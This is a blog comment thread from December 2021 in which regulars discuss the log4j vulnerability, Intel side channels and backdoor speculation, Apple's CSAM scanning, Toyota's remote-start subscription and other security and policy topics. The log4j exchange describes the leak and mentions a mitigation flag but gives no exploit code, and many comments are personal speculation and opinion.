If a new civil $10KClaim enforcement law is passed for explicit content, any and all such content, the provider, supply chain, and destination becomes a source of $10KClaim law suits

The difference between the existing system and the new system is in enforcement.

  • Currently harmful explicit content must reach a particular threshold to qualify for criminal proceedings
  • Under the new system there is no requirement threshold to qualify for the $10KClaim

Any person in any US State may bring such a suit. There is no requirement for direct harm needed.

  • Currently, a person must prove direct harm to bring a lawsuit, this is often referred to as “Standing”. If there is No Harm there is No Penalty.
  • Under the new $10KClaims there is no requirement for direct harm.

There have been a number of lawsuits brought by persons who’s jobs require them to view images and videos depicting the worst depravity that can be inflicted by humanity. They have to view thousands of these images every day for hours on end. All social media companies have phalanxes of people sorting through the legal vs not-legal images. LEOs also go through the same images.

These “explicit content moderators” have brought suits for mental and physical health harms from watching such content. Some have been successful and some have not been successful. Often the failure is not over the impacts on the persons health status, but over a definition of whether the person is an employee or contractor or sub-sub-sub-contractor.

Under the $10KClaim laws it would not matter if the filer was an employee, contractor, sub-sub-sub contractor, or had directly viewed any images or some n-number of images or was even in the same State where the company was located or where the images were viewed.

The entire supply chain makers from Camera to PC to Internet Routing to Media Company could be liable for $10KClaims for every instance that violated the civil enforcement law.

In the USA Small Claims Courts do not allow directed legal representation. The individuals represent themselves. A Media Corporation would not normally be able to send down their Big Legal Teams to represent them in these courts.

Consider More

The same process can be applied to Gig Economy Workers by defining some aspect such as Tip-Clawbacks to be illegal with civil enforcement.

It could be applied to Personal Data Protections where “malware, telemetry or software that extracts, adds, calculates or identifies a user” is illegal. Opt-Out Opt-In would be irrelevant to the $10KClaim.

There are @26 US States with “Copy-Cat Texas” laws ready to implement immediately upon SCOTUS approval of the technique. The official SCOTUS response is expected June 2022.

someone December 13, 2021 3:49 PM

@Clive re: crap in newsfeeds – I found your post a bit terse, so I’m uncertain we are addressing the same point (time-contrained, so I skipped a number of intervening posts). Anyway, with JS off, clicking on a link in Google News will open a new page showing the actual link to the article at the host site, without the crap. I’m assuming that part of the crap is code that gets Google its micropayment for the link (my objective was to try to stiff them on that). I copy the displayed host link, call up my home page (which resides on my local drive and is plain text) I then navigate from my home page to the host link. Does this keep Google from getting credit? I have no way to ascertain that, and I can easily think of a dozen alternative ways they could be credited, but I’m hopeful my browsing pattern at least doesn’t fit their assumptions.

SpaceLifeForm December 13, 2021 5:44 PM

@ lurker, Ted, Clive, ALL

log4j CVE-2021-44228

I saw this coming from a country mile.

Repeating:

That it can leak server-side environment variables to the attacker controlled DNS server (because the DNS traffic is most certainly cleartext), is, well, not good.

The problem is that the logging software does not log itself, and when it leaks, that the leak occurred, is itself, not logged.

Logging software should only write to disk or to internal servers.

https://www.twitter.com/kennwhite/status/1470438229539233796

,but also now seeing telemetry from several sources that looks to be critical API keys/secrets leaks. Basically, a one-punch silent unlogged theft of critical instance credentials. That is Not Good.

Clive Robinson December 13, 2021 8:15 PM

@ SpaceLifeForm, ALL,

With regards,

“Basically, a one-punch silent unlogged theft of critical instance credentials.”

“Wham, bam, thank you for the root of trust”

Have you noticed in real life things are very very rarely “Black or White” there is a spectrum of “grey”?

As humans we over trust by nature but we very rarely “fully trust”. Yet our systems are secure or insecure, trusted or not trusted…

It begs the question “Can we have ‘shades of grey’ in security?”

Some years ago now I did work on what I called “Probablistic security” where you could in effect set a threshold. I did not take it as far as it could have gone I’m thinking it’s time for people to take it further, if for no other reason than to minimise the impact of the loss of the root of trust.

Clive Robinson December 13, 2021 9:25 PM

@ SpaceLifeForm,

For some reason the “2” in “12” went missing in your link…

https://www.theregister.com/2021/12/13/chipzillas_mystery_linux_muckabout_is/

But…

What is Intel upto?

I noted the possability of FPGA added to CPU’s the other day.

The Register opinion piece gives an apparently different view based on the old “Big Iron” tricks that can still be found in IBM Z servers and if you have them decade old Sun boxes.

The simple fact is that all the Register article says applies even more so to “hardware algorithms”.

But there is a third thing to consider, which is “Backdoors”.

We know Intel’s hardware is riddled with bugs, and that they ship “microcode patches” to actually get your CPU up and approximating stable.

We also know there is a lot goes on in the famed “Ring -3” with hidden *nix “overlord” hardware, that the US Gov does get access to to at the very least “turn off” functionality.

It would be no great supprise to me if Intel started putting more “Silicon Bugs” in their chips to create “side channels” to “leak information”.

The ability to turn them on and off would be quite desirable to a number of people…

As I said a few days back there is more than one side channel domain,

1, Amplitude domain
2, Time domain

Are the two primary ones that give us both,

3, Frequency domain
4, Sequency domain

Both of which work in constant time in some manner.

But what if time is not constant?

Well the sequency domain becomes a new domain,

5, Event domain.

But what does that mean?

Imagine a line that represents a spectrum from fully determanistic to fully random at the other with chaotic covering the middle.

It’s also a spectrum of complexity with low complexity to high complexity.

Obviously the amplitude domain falls at the low complexity end with the time domain a little further up. The event domain appears more towards the high complexity end.

So finding side channels based on these domains gets increasingly harder for an “observer” and at some point crosses a threshold where in effect you can not tell the difference between compexity carrying information out as a side channel from random noise.

SpaceLifeForm December 13, 2021 9:57 PM

@ Clive

Decoding BaaS in Silicon Turtles

Not sure why the “2” dropped, as it was a plain C+P, but maybe I accidentally deleted it before the cut. Maybe.

Anyway, I knew you would not be stumped very long.

You connected the dots, and figured out what the “B” means.

The real question is, why would it be ‘as a Service’?

As in, service to whom?

Just the highest bidder?

ResearcherZero December 13, 2021 11:16 PM

@Clive Robinson

“the root of trust” is very important, and I would argue it increasingly applies even to what people believe, not just authentication.

It is why hybrid warfare is a fools gambit.

Nils Melzer, UN Special Rapporteur on Torture:

“I know, you may think I am deluded. How could life in an Embassy with a cat and a skateboard ever amount to torture? That’s exactly what I thought, too, when Assange first appealed to my office for protection. Like most of the public, I had been subconsciously poisoned by the relentless smear campaign, which had been disseminated over the years. So it took a second knock on my door to get my reluctant attention. But once I looked into the facts of this case, what I found filled me with repulsion and disbelief.”

“In the end it finally dawned on me that I had been blinded by propaganda, and that Assange had been systematically slandered to divert attention from the crimes he exposed. Once he had been dehumanized through isolation, ridicule and shame, just like the witches we used to burn at the stake, it was easy to deprive him of his most fundamental rights without provoking public outrage worldwide. And thus, a legal precedent is being set, through the backdoor of our own complacency, which in the future can and will be applied just as well to disclosures by The Guardian, the New York Times and ABC News.”
https://medium.com/@njmelzer/demasking-the-torture-of-julian-assange-b252ffdcb768

“House arrest would be absolutely possible. They did it with Augusto Pinochet. The former dictator of Chile was in extradition detention in London for 18 months. But he was not put in a high-security prison, but accommodated in a villa under house arrest. He was even visited by the former prime minister [Margaret] Thatcher, who brought him whisky. He had a very privileged existence.”

“It is important to understand that, in extradition detention, you are not to be treated as a criminal. You are just detained so you cannot escape in case you will end up being extradited. That Julian Assange is being put in a high security prison with extremely severe restrictions on his private and professional life and procedural rights is completely disproportionate.”

“It’s unnecessary, there is no legal basis to do that. The intent is clearly to intimidate other journalists, to silence him so he cannot do his journalistic work, which he clearly is entitled to exercise freely.”
https://www.dw.com/en/un-rapporteur-on-assange-the-us-is-trying-to-criminalize-investigative-journalism/a-56076248

So if you are a dictator and you torture, execute and disappear people, you get whiskey.

If you instead publish the painful truth, you don’t get any whiskey, you are sent to a maximum security prison, and you are not even afforded the legal defense preparations that are given to even the very worst of criminals.

States are dissolving “The Root of Trust”, this is in turn acting as a destabilizing force. They are destabilizing with spy tools and surveillance, they are destabilizing with political persecutions, and they are destabilizing with conspiracy theories which are amplified by their own political ‘fixers’.

If this isn’t bad enough, studies have shown exposure to automation led to an increase in support for radical-right parties in Western European countries between the late 1990s and 2016.
https://www.knowledge.unibocconi.eu/notizia.php?idArt=23580

“individual exposure to the automation shock leads to poorer perceived economic conditions, lower likelihood of having a permanent contract, and lower satisfaction with the government and democracy.”
https://doi.org/10.1073/pnas.2111611118

And there are a lot of additional costs that come with our fancy little gadgets, and that is even before considering the loss of privacy and growing authoritarianism.

RABBIT HOLE WARNING

60% of China’s ground water is rated unfit for human consumption, and the industry that supplies chemicals to the electronics industry is a $20B a year industry, which is quite an incentive for “business as usual”.

“The fact that women around the world were still being subjected to things that experts, including corporate leaders, decided should not be used in the workplace—to me that is an extremely sad story, and a loss for public health.”
https://www.bloomberg.com/news/features/2017-06-15/american-chipmakers-had-a-toxic-problem-so-they-outsourced-it

In a 1911 lecture to the Eugenics Education Society in London, Sir Thomas Oliver, a physician, spoke of his hard-won success “in securing the emancipation of female labour from the dangerous processes of lead-making. …Lead hits hard the reproductive powers of man and woman, but especially of woman.”
https://www.slate.com/articles/business/moneybox/2015/07/toxic_substances_in_electronics_manufacturing_the_u_s_does_tragically_little.html

“What began a year ago as a drive, according to the chemical conglomerate’s spokesmen, to shift its female employees out of positions at the company’s plant here where exposure to lead could harm their unborn children has backfired into charges by five of the women that they had to have themselves surgically sterilized to keep their jobs.”
https://www.washingtonpost.com/archive/politics/1979/01/01/women-say-they-had-to-be-sterilized-to-hold-jobs/74f7104e-8449-48d2-9592-c52d496dfffc/

“Families and a labour welfare group believe the leukaemia was caused by exposure to chemicals used to clean electrical panels and say many more workers could have been affected. They add that young workers who fall sick with leukaemia are dismissed and denied continuing medical coverage, bankrupting families as they desperately pay for treatment.”
https://www.dailymail.co.uk/news/article-2754824/Mystery-cancer-cluster-killing-Chinese-workers-factory-makes-new-iPhone-6-At-13-staff-diagnosed-leukaemia-falling-sick-plant-recent-years.html

That is a big reason why people in China have riots and protests, because the rivers and ground water are increasingly becoming a toxic soup, and the health effects are making people desperate and angry.
Then the Chinese Government in turn increases surveillance, authoritarian behavior, and creates a subjugated workforce to build the surveillance apparatus.

This in turn creates more pollution and growing resentment, so it creates a social credit scheme, and hopes that descending into the fantasies of a Brave New World can subdue the problem. Meanwhile Steve Bannon is thinking to himself, “Hell, why not have our own Cultural Revolution?”

ResearcherZero December 13, 2021 11:43 PM

Plato said it more simply around 2,400 years ago, in the 5th century BCE, “We can easily forgive a child who is afraid of the dark; the real tragedy of life is when men are afraid of the light.”

SpaceLifeForm December 14, 2021 12:40 AM

log4j CVE-2021-44228

Newer bad news

Apparently, -Dlog4j2.formatMsgNoLookups=true does not always work.

The version of the Java (JRE) apparently does not matter other than getting on the treadmill (because log4j 2.15 requires Java 8).

The 2.15.0-rc1 version of log4j was a bad fix and has already been worked around, so now there is a 2.15.0-rc2 version that supposedly (wink, wink) stops any exploit.

SpaceLifeForm December 14, 2021 1:12 AM

@ Clive

a phone emulator running inside a container on an isolated windows box

Best Oxymoron I’ve read in some time.

Winter December 14, 2021 1:48 AM

@Clive, All
“What is Intel upto?”

Making money and protecting market dominance?

I find the reasoning by The Register entirely plausible. Modern chips run the old instruction sets in an emulator. Price segmentation is a well established way of monopolies and oligopolies to fleece customers. Crippling products is widely used to do that. Crippling products increases cost, and DRM is a relatively low cost way of crippling product.

Intel has been doing this for a long time, so why not now?

ResearcherZero December 14, 2021 3:19 AM

There is currently still not enough incentive to secure organizations and institutions. There is so much money pumping through some of these institutions, and some of them don’t care where the money is coming from. There is also the problem of social media, which is also fueled by advertising and data monetization, and a profit model of engagement, which also has not cared much about where the money is coming from.

It’s just not a problem of political manipulation, there is also a bizarre experiment in altering human psychology taking place.

Social media is providing both a dopamine reward response from positive feedback, and negative feedback is generating a ‘flight or fight’ response. The negative feedback is leading to real life negative consequences, real life anger, sometimes provoking incidents which lead to violence.

“…when it comes to massive social platforms like Facebook, Instagram, or YouTube, the root of many problems is the use of ranking algorithms designed to maximize engagement. A system optimized for engagement rather than quality is one that supercharges the reach of plagiarists, trolls, and misleading, hyper-partisan outrage bait.”
https://www.wired.com/story/congress-takes-aim-at-algorithms-section-230-reform/

Social media companies are “behavior modification empires,” perfecting the techniques behaviorist psychologists pioneered decades ago.
https://thinkr.org/newsletter/ten-arguments-for-deleting-your-social-media-accounts-right-now

Building a disinformation network:

The GRU created think tanks and media outlets to serve as initial content drops, and fabricated personas — fake online identities — to serve as authors.
https://cyber.fsi.stanford.edu/io/news/potemkin-pages-personas-blog

Through the process of mapping the GRU-attributed author and distributor networks, we observe numerous suspicious and false personas who appear to contribute regularly to a network of “independent media” and “alternative news” publications.
https://fsi-live.s3.us-west-1.amazonaws.com/s3fs-public/potemkin-pages-personas-sio-wp.pdf

High-value and long-running personas cultivated influence within US political discourse. These accounts were retweeted by political figures, and quoted by media outlets.
https://fivethirtyeight.com/features/what-you-found-in-3-million-russian-troll-tweets/

Putin’s order took the formerly state-run RIA Novosti news agency, and the Voice of Russia radio station, and transferred them to the new agency, whose name means “Russia Today.”
https://medium.com/dfrlab/putinatwar-how-sputnik-secures-russias-interests-61a8f2fcf8ec

President Vladimir Putin shut down RIA Novosti, which was respected for its news coverage, earlier this month (December 2013).
https://www.bbc.com/news/world-europe-25560434

Russian propaganda is produced in incredibly large volumes and is broadcast or otherwise distributed via a large number of channels.
https://www.rand.org/pubs/perspectives/PE198.html

Gerard van Vooren December 14, 2021 4:16 AM

@ Winter,

I find the reasoning by The Register entirely plausible. Modern chips run the old instruction sets in an emulator. Price segmentation is a well established way of monopolies and oligopolies to fleece customers. Crippling products is widely used to do that. Crippling products increases cost, and DRM is a relatively low cost way of crippling product.

That is probably the reason why Apple went to ARM for their newest generation of hardware. And I am sure that others will soon follow because ARM is “the better product” AFAIK. But of course there is always the problem of software compatibility. Maybe it is time to get rid of MS and Intel.

Winter December 14, 2021 4:28 AM

@Gerard van Vooren
“But of course there is always the problem of software compatibility. Maybe it is time to get rid of MS and Intel.”

The software, and data, are worth more than the hardware. So I am afraid that will not happen. The i86 instruction set will outlive the Desktop PC & Laptop by a margin. See Cobol, which lives on way beyond the usefulness of the original hardware.

Clive Robinson December 14, 2021 6:33 AM

@ SpaceLifeForm,

Just the highest bidder?

More like,

“Highest up the Hierarchy”…

As for the oxymoron, yes it would look like one, but that is the way things are set up in that test lab…

Apparently it’s the old problem of OSS is not “sufficiently trusted” by some “managers”…

Clive Robinson December 14, 2021 6:56 AM

@ SpaceLifeForm, ALL,

Re Apple tags and,

The last paragraph is an eye-roll.

Apple do not appear to have worked out that for anyone half smart thry can use multiple tags in rotation or some random pattern…

But it’s more subtle you can “track a phone” when you know where the tags are.

Let me put it this way, even though Apple use encryption and supposadly hide the ID of the iPhone that picks the tag up,

“The Signal is the message”

And all you have to do is,

“Lift the signal above the noise”

Which is basically what some of the more interesting bits of “Traffic Analysis” are all about.

I won’t go into the fun detsils but note what any basic book on “Signals Detection” will tell you,

1, If the noise aproximates to AGWN then it is effectively random.

2, The signal is not random but is not initially synchronized.

3, When the signal is synchronized, simple averaging will lift it above the noise floor.

The hard part would normally be getting synchronozation, but when you know where the tag or beacon is synchronisation becomes trivial via a purposeful side channel.

The rest as they say,

“Will be left as an excercise for the reader.”

Clive Robinson December 14, 2021 7:26 AM

@ Winter, ALL,

I find the reasoning by The Register entirely plausible.

As I indicated it is…

But you have to remember in ICTsec it’s now common to consider “happenstance” as “enemy action”[1]. Simply because you can not tell the difference between accident and design when it comes to vulnarabilities being created. That old saying of “never attribute malice…” is the opposite of reality these days in ICTsec. You assume malice then let others prove incompetence if that is even possible…

So my thoughts are “What is behind the curtain?” because it sure ain’t a little wizened wizard.

I know that Intel have been planning for some time to put FPGA’s in high end server chips so that algorithms can become single instructions at fifty times the speed of software. But look at it logically the aim is to sell chips that others can not, making such changes have to be signed off by Intel’s Private Key is not going to encorage people to develop FPGA algorithms.

That is there has to be something more than just ordinary “profit gouging”.

As I’ve indicated, in the past certain Intel customers got the keys to that “Ring -3” Managment Engine, that is in effect the “Keys to the kingdom”.

Therefore as I’ve said to @SpaceLifeForm, it’s more likely to be “How high in the hierarchy” rather than “how high the price”.

I guess time will tell some, but probably not most unless someone blows a whistle to call time.

But to be honest, on a personal note, not only have I left the Micro$haft “hamster wheel of pain” and “outright spying”, I’m in the process of moving hardware as well. ARM chips in the main give more bang for your buck than Intel and at less than a quater of the running costs.

But for much of what I do or need to do can be done on “Microcontrolers” using MIPS or other cores…

So my advice is to regard Intel as rather more than hostile and “move away”. And the sooner people start, then at the very least, the less monopoly Wintel have, so the more competitive the market they will have to swim in which should be to every consumers advantage to a point.

[1] From the old military saying,

Once is happenstance, twice is coincidence, thrice is enemy action.

someone December 14, 2021 6:09 PM

@Winter re: software longevity & COBOL I’m not certain your analogy holds up to close scrutiny. COBOL remains a “thing” only because of the types of applications written in it, large scale banking and military administration (initially running on IBM mainframes, then ported to emulated environments) to name two. I cut my programming teeth on COBOL. Employment opportunity realities, however, soon found me programming in RPG II and OCL on IBM minis. I challenge you to find much of anything coded in RPG II that is still in production use.

ResearcherZero December 14, 2021 10:20 PM

@Clive Robinson

Reminds me of this.

“The series of deep intrusions—called Operation Skeleton Key due to the attackers’ use of a “skeleton key injector” technique—appeared aimed at stealing as much intellectual property as possible, including source code, software development kits, and chip designs. And while CyCraft has previously given this group of hackers the name Chimera, the company’s new findings include evidence that ties them to mainland China and loosely links them to the notorious Chinese state-sponsored hacker group Winnti, also sometimes known as Barium, or Axiom.”
https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/

The hackers are known to abuse Cobalt Strike, a penetration testing tool and a custom skeleton key obtained by twisting the codes of Dumpert and Mimikatz.
https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf

Clive Robinson December 15, 2021 3:04 AM

@ SpaceLifeForm,

Some comments are very sound. Many are misdirection. The ratio tells.

But “none of them groked” the BaaS aspect. Which the original author apparently did but was skating around.

But it took the commentors over there something like sixty comments to discuss what was said in what three comments here…

That’s a heck of a different “noise to signal ratio” over there…

Gerard van Vooren December 15, 2021 5:47 AM

@ Clive and others,

You know that I like to program a bit, not professionally. To be honest, I don’t like Rust, I know it is safe, but I don’t like the architecture of it. I don’t like the syntax. To me, they released too early. That problem can’t be fixed IMO. I like Go, but Go has problems too. For instance, the linking takes too long and the file sizes are massive. This problem can be solved by adding hardware but I think that the Go authors made a mistake with this as well. They should have looked at Oberon, what compiles like a rocket and the size of it is minimal. I even like their motto (of Einstein), that looks something like: “Make things as simple as possible but not any further”.

So Go also has it’s problems. And then I found the V language (vlang.io). V is a new PL, written by Alexander Medvednikov. It is a PL with the looks of Go, it compiles like a missile, the file size is small,comparable with C, and to be honest, I don’t know any downsides of it. It is safe too, you can link with C. It doesn’t really use a GC, and cleans up the crap that you create automatically. So, what am I not seeing here? What are the downsides of V?

Clive Robinson December 15, 2021 7:39 AM

@ ResearcherZero,

the company’s new findings include evidence that ties them to mainland China and loosely links them to the notorious Chinese state-sponsored hacker group Winnti,

Actually from what is said in the article, as usuall there is no actual evidence that could not just as easily have been faked, by tools that got liberated from a US Gov agency not so long ago.

So whilst you could argue China you could also argue US, especially as they have been pushing TSMC to move their fabs to the US for some time now, which the Taiwanese Government has resisted for obvious reasons.

In some respects some US politicos think that TSMC was started with US kniw how, therefore it’s American tech…

The reality is back in the 1970’s when “Made in China” and “China knock-off” refered to the Island of Taiwan not Mainland China. Taiwan was making a lot of household and similar electronics with Japan being the techbology leaders. Encoraging Taiwan to go into seniconductor manufacture was seen as a way to loosen the hold Japan had over the US consumer electronics industry.

It was not just Taiwan that was “encoraged” but South Korea as well.

So what has happened is that US State Dept “National Security” plan whilst initially working, almost entirely backfired…

What Taiwan did with what became “Taiwan Semiconductor Manufacturing Company”(TSMC) was in a way what “Acorn Research Machines”(ARM) did in the 1980’s.

ARM designed chips but did not manufacture, it licensed the design. What TSMC did was not design and make their own chips, but manufacture chips for other people.

Both ARM and TSMC’s choices turned them into world leaders with the result both companies realy should be seen as “National Security” assets for their respective countries.

Unfortunately ARM got sold off to “SoftBank” and their are allegations still floating around that this was with Chinese Money. However the US is trying to get it’s hands on ARM one way or another, how that plays out might cause a “fire sale” that breaks ARM up and destroys it.

I suspect TSMC being the worlds largest producer of ARM designs, is rather aware of the “Power Plays” going on behind the scenes. Which is maybe why they are so far only realy talking about setting up a $14billion plant in Arizona.

The problem from TSMC’s point of view is that if they set up a 5nm fab as the US Gov is pushing for, it’s a huge investment in a foreign nation it has little reason to trust based on the tricks by the previous administration. So such a plant would be a very significant “hostage” not just monetarily but way more importantly in “Intellectual Property”(IP).

No doubt some in the US Government would not be adverse to putting the “hurry up” on TSMC…

The problem for the US though is that TSMC has more affiliation with Europe, on which it is rather more than dependent, but effectively “joined at the hip” with,

1, ASML in the Netherlands
2, Zeiss in Germany.

As I’ve mentioned before ASML are the world leaders in fab technology and they in turn are dependent in turn on Zeiss for the world leading optics.

The US is known to have “put the screws” on both companies in the past so whilst in public there might be smiles Europeans have “long memories” of much that has been stolen IP wise in the US.

The other thing to remember is all the US 5G and Huawei nonsense is nothing what so ever to do with “spying” GCHQ thus the NSA know exactly what goes into Huawei’s leading edge technology.

The US do not like GSM because they can not “milk it” currently. They want to cause it to stall and fail and try to grab what will be 6G thus they can not only milk it via Royalties, they can also put lots of little NSA / GCHQ hooks in to do exactly what the US have accused the Chinese of doing.

TSMC are fairly well aware of what is going on as they manufacture the chips for Broadcom, Qualcomm, and Nvidia.

Names anyone with knowledge of Telecomms, high end computing and Smart Devices and IoT should be more than aware of. Oh and Nvidia is trying to grab ARM at a knock down price only the EU has effectivel said “NO” and the UK Government is now belatedly waving it’s arns around.

What is unknown is who it is designed to help and who it is to frustrate.

I’d put a small wager, based on the current UK PM and Ministers, it would be the US abd EU respectively. Especially as current US State Dept policy is to “stir it up and destabilize Europe”. Which is in part behind the recent AUKUS agreement (of which there is one hell of a lot more going on behind the scenes than most suspect).

Other things going on suggest that the US is planning to in effect “go to war” at least economically with the EU and potentially militarily as well with China. Which is probably good news for Iran, but not North Korea, South Korea, Japan or Taiwan and several other countries around the South China Seas and up and down the West Pacific region that China increasingly sees as it’s “buffer zone” and sphere of influence.

How this is going to play out is anyones guess at the moment, especially with some of the all to clear, idiocy going on in the “US Opposition” currently. But I’d advise people to be skeptical of apparent “slam dunk” cyber accusations against China.

Clive Robinson December 15, 2021 11:27 AM

@ Ted,

Is Apple rolling back CSAM detection?

Well the message on,

https://www.apple.com/child-safety/

Indicates that might be the case, as it only talks about nudity and importantly not sending notifications.

However…

Read the update at the bottom of MacRumours that says,

” Apple spokesperson Shane Bauer told The Verge that though the CSAM detection feature is no longer mentioned on its website, plans for CSAM detection have not changed since September, which means CSAM detection is still coming in the future.”

You can read more on,

https://www.pcmag.com/news/apple-quietly-removes-mention-of-anti-child-porn-system-from-its-website

https://www.macrumors.com/2021/12/15/apple-nixes-csam-references-website/

https://everything-apple.news/2021/12/15/apple-removes-references-to-controversial-csam-scanning-from-website/

https://www.theverge.com/2021/12/15/22837631/apple-csam-detection-child-safety-feature-webpage-removal-delay

AL December 15, 2021 12:46 PM

According to Apple, the CSAM was included in update IOS 15.2
https://www.apple.com/child-safety/
Way I look at it, once there is a client side scanner, it can be repurposed to scan anything. Apple has opened a door, and I see government orders walking in to order a reconfiguration of that scanner.

Ted December 15, 2021 1:21 PM

@Clive

Re: Apple, CSAM, and let’s not forget… on-device scanning

Just fantastic Clive. Beautiful.

I’m grateful that the PC Mag article you shared had a link to Apple’s previous CSAM detection notice on their site.

The Messages app will use on-device machine learning to warn about sensitive content, while keeping private communications unreadable by Apple.

https://web.archive.org/web/20211210163051/https://www.apple.com/child-safety/

I though you might appreciate one of the more liked comments on the MacRumors article. This is the same article with Apple’s recent update: “CSAM detection is still coming in the future.”

Jim L.
If I ever find out this has been surreptitiously added without my knowledge then I will sell every Apple device I own and never buy another. Anyone who doesn’t have an issue with this has no clue of the concept of mission creep. If these systems are allowed to exist then it’s only a matter of time before the Feds batter your door in for having a [insert future dictator here] meme in your iCloud library. The road to hell is paved with good intentions.

Also from that MacRumors article was the following paragraph:

Apple said its decision to delay was “based on feedback from customers, advocacy groups, researchers and others… we have decided to take additional time over the coming months to collect input and make improvements before releasing these critically important child safety features.”

I’m not sure if this comment from Apple was it’s most recent. Will they be providing public details on CSAM detection when(?) they decide to implement it? Will there still be on-device scanning?

In the most recent update, it looks like there were changes to Messages pertaining to child safety and nudity, but I don’t think anyone noticed anything explicit about CSAM and on-device scanning. The Verge article has some particularly good links. It also says that “Documents outlining how the functionality works are still live on Apple’s site.”

https://www.apple.com/child-safety/pdf/CSAM_Detection_Technical_Summary.pdf

https://www.apple.com/child-safety/pdf/Expanded_Protections_for_Children_Frequently_Asked_Questions.pdf

So it’s definitely something to keep an eye on, right Jim L. and everyone?

JonKnowsNothing December 15, 2021 3:26 PM

@Clive, @All

re: Car Key Fobs needed to start Toyota cars is now a service costing $8/mo”

Automakers keep trying to get a piece of that sweet, sweet subscription income. Now, it’s Toyota’s turn.

Nearly every car company offers some sort of subscription package, and Toyota has one called Remote Connect. The service offers the usual fare, letting owners use an app to remotely lock their doors, for example, or if they own a plug-in vehicle, to precondition the interior.

But as some complimentary subscriptions for Remote Connect come to an end, Toyota owners are getting an unexpected surprise—they can no longer use their key fob to remote-start their vehicles.

fwiw:

My slightly older VW has a door key hidden inside the fob, usable in case the fob battery dies you can get inside. The car does not have an ignition key slot. You have to hold the fob against a magic circle. Yes. If the fob battery is dead, you cannot start the car anymore than you can open the door.

Having to pay a fee just to start the car with a good key fob battery and no option for a keyed ignition?

I’m NoSoKeenAboot this.

Ranks right up there with their Full Size Pickup Trucks where they have huge bolts sticking up in the of the bed floor. Clearly no one at Toyota ever bucked hay…

===

  • Toyota owners have to pay $8/mo to keep using their key fob for remote start
    Feature requires subscription even though it doesn’t use connected services.

ht tps:/ /ar st echn ica. com /cars/2021/12/toyota-owners-have-to-pay-8-mo-to-keep-using-their-key-fob-for-remote-start/

Ted December 15, 2021 3:48 PM

Ars Technica has more details on Apple’s recent updates.

Also what do you all think of the new App Privacy Report in iOS 15.2? Weird or good?

App Privacy Report in Settings lets you see how often apps have accessed your location, photos, camera, microphone, contacts and more during the last seven days, as well as their network activity.

https://arstechnica.com/gadgets/2021/12/apples-ios-15-2-and-macos-12-1-updates-hit-supported-devices-today/

From WaPo:

… but there are some things it still can’t tell us, like exactly what data is being collected or sent by these apps.

For example, you might see that a dog-sitting app accessed your contacts but not know what it took…

Or you might notice that a plant-identification app contacted multiple outside domains, but not know what sort of data was sent to those addresses.

“They are taking the medium to long term view that, essentially, if you name and shame enough of these then apps will gradually improve their behavior,” said Johnny Lin, the co-founder of San Francisco company Lockdown

https://www.washingtonpost.com/technology/2021/12/15/ios-privacy-report/

SpaceLifeForm December 15, 2021 10:33 PM

@ JonKnowsNothing

Toyota owners have to pay $8/mo to keep using their key fob for remote start
Feature requires subscription even though it doesn’t use connected services.

How does the car computer know if the owner paid the vig?

Is the fob like an AirTag?

JonKnowsNothing December 16, 2021 1:19 AM

@SpaceLifeForm

re:KeyFob AirTag

The article didn’t say how they disable the fob feature but did say the fob doesn’t use connected services.

Zho…

There is the old OnStar/Updater to the car software system.

At least my OnStar knows I never subscribed to OnStar because if I accidentally push The Red Button which is conveniently located near the ceiling light switches, it tells me so.

The same over-the-air process handles all those other apps and features for the entertainment systems.

I would guess, that in the absence of subscription=YES flag, the car software ignores the remote command. The fob or apps sends the remote start command but the car software drops it in the bit bucket.

It might be worth noting that if the remote start can be disabled by over-the-air updater, there isn’t any reason they can’t block the car from starting in other situations. As previous discussions pointed out, stopping the engine of a moving modern car has many dangerous side effects. However, halting the engine of the car when already stopped (not in motion) or the engine turned off (while refueling etc) might be possible.

iirc(badly) One of the recommendations for remote start was a safety issue for workers in late night or isolated location situations. The worker would know before exiting the safety of the locked building that the car was running.

Also for bad weather conditions where you might have a lot ice on the windscreen, the remote start would also turn on the window defrosters. Again a safety feature so the worker doesn’t have to wait 20m in the car while the ice melts.

ResearcherZero December 16, 2021 1:34 AM

Relativity confirmed to be true again through observations of two companion pulsars.

“We see for the first time how the light is not only delayed due to a strong curvature of spacetime around the companion, but also that the light is deflected by a small angle of 0.04 degrees that we can detect.”

https://www.mpifr-bonn.mpg.de/pressreleases/2021/12

SpaceLifeForm December 16, 2021 2:29 AM

@ JonKnowsNothing, Clive

The article didn’t say how they disable the fob feature but did say the fob doesn’t use connected services.

Which has to be a lie or spin. There has to be some comms somewhere.

Winter December 16, 2021 3:07 AM

@ResearcherZero
“Relativity confirmed to be true again through observations of two companion pulsars.”

It is outrageous that such a simple theory (it is nothing more than applied Math) is so successful.

Physics is now cursed by two incompatible theories, General Relativity and Quantum Field Theory, that are both exact to the last measurable decimal.

Ted December 16, 2021 8:02 AM

@SpaceLifeForm, Clive, ALL

Planet or fruit?

That’s really interesting. To add to that, Ross Anderson, who is a non-prolific tweeter, retweeted this:

@SarahJamieLewis
Thinking all the way back to a few months ago when everyone was talking about threat models and image sharing and client side scanning and how silly a scenario is was to imagine a method of getting an innocent target to download a file that would result in a match.

Sarah’s was a quote retweet on this:

I crafted a PNG image that says something different on Apple vs non-Apple devices:

https://www.da.vidbuchanan.co.uk/widgets/pngdiff/

(unfortunately it won’t work directly on twitter…)

https://twitter.com/sarahjamielewis/status/1471325841632100354

Winter December 16, 2021 12:59 PM

10 anti-5G products, ie, they should protect against cellular 5G radiation, among them the Quantum Pendant, have been recalled by the health authorities in the Netherlands as they are too radioactive. They emit too much radiation.

Dutch site:
ht-tps://www.autoriteitnvs.nl/actueel/nieuws/2021/12/16/heeft-u-een-quantum-pendant-anti-5g-hanger-of-negatief-ionen-sieraad-of-slaapmasker-leg-deze-veilig-weg

Winter December 16, 2021 2:00 PM

Continued:
An English language site with warnings:
This remedy sounds like Homeopathy: Protect against radio waves with radioactive materials. Both have the words “radio” in their name and are electromagnetic radiation.

The items are advertised as having negative ion technology, quantum scalar energy, volcanic lava energy, and quantum science. Items include pendants, wristbands, kinesiology tape, and other personal items. They are advertised as a way to maintain health, balance energy, and improve emotional well-being. Some also claim to protect people and pets from electromagnetic fields (EMF).

Reading such stuff I remind myself of this famous quote:
I know of only two infinites, the Universe and human stupidity, and I am unsure about the Universe

https://www.doh.wa.gov/CommunityandEnvironment/Radiation/RadiationTopics/RadioactiveConsumerProducts

Clive Robinson December 16, 2021 4:02 PM

@ Winter, ALL,

